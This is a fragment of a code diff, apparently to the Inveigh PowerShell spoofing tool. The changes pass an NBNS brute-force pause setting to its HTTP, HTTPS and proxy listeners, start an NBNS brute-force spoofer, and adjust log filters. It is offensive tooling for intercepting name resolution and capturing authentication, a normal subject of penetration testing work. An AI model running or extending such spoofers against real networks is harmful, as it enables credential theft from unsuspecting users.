$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")]) } } @@ -3088,8 +3093,8 @@ function HTTPListener() $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( - $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( - $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null $HTTP_powershell.BeginInvoke() > $null } @@ -3109,8 +3114,8 @@ function HTTPSListener() $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( - $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( - $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null $HTTPS_powershell.BeginInvoke() > $null } @@ -3130,8 +3135,8 @@ function ProxyListener() $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument( $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( - $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument( - $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null $proxy_powershell.BeginInvoke() > $null } @@ -3262,6 +3267,12 @@ elseif(($LLMNR -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privi } +# NBNSBruteForce Spoofer Start +if($NBNSBruteForce -eq 'Y') +{ + NBNSBruteForceSpoofer +} + # Control Loop Start if($RunCount -or $RunTime -or $inveigh.file_output -or $NBNSBruteForcePause) { @@ -3292,7 +3303,7 @@ if($inveigh.console_output) $inveigh.console_queue.RemoveAt(0) } - {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"} + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} { if($ConsoleOutput -eq 'Y') @@ -3769,7 +3780,7 @@ if($inveigh.tool -ne 1) $inveigh.console_queue.RemoveAt(0) } - {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"} + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} { if($ConsoleOutput -eq 'Y') |